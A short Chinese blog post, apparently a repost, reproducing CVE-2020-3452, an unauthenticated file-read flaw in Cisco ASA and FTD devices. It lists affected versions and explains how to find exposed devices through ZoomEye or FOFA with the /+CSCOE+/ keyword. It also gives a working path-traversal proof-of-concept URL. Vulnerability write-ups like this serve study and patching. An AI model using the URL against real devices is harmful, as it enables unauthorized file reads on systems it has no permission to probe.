一、前言
前端时间碰到了该漏洞,记录一下!
二、漏洞介绍
该漏洞为思科ASA设备和FTD设备的未授权任意文件读取漏洞,但仅能读取到 WEB
目录下的文件,影响版本如下:
- Cisco ASA:
- Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
- Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
三、漏洞复现
首先利用 zoomeye
或者 fofa
搜索设备,搜索关键词为 /+CSCOE+/
,如下图所示:
POC
为 URL/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
,如下图所示:
Original: https://www.cnblogs.com/aWxvdmVseXc0/p/15585849.html
Author: windy_ll
Title: CVE-2020-3452漏洞复现
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/585608/
转载文章受原作者版权保护。转载请注明原作者出处!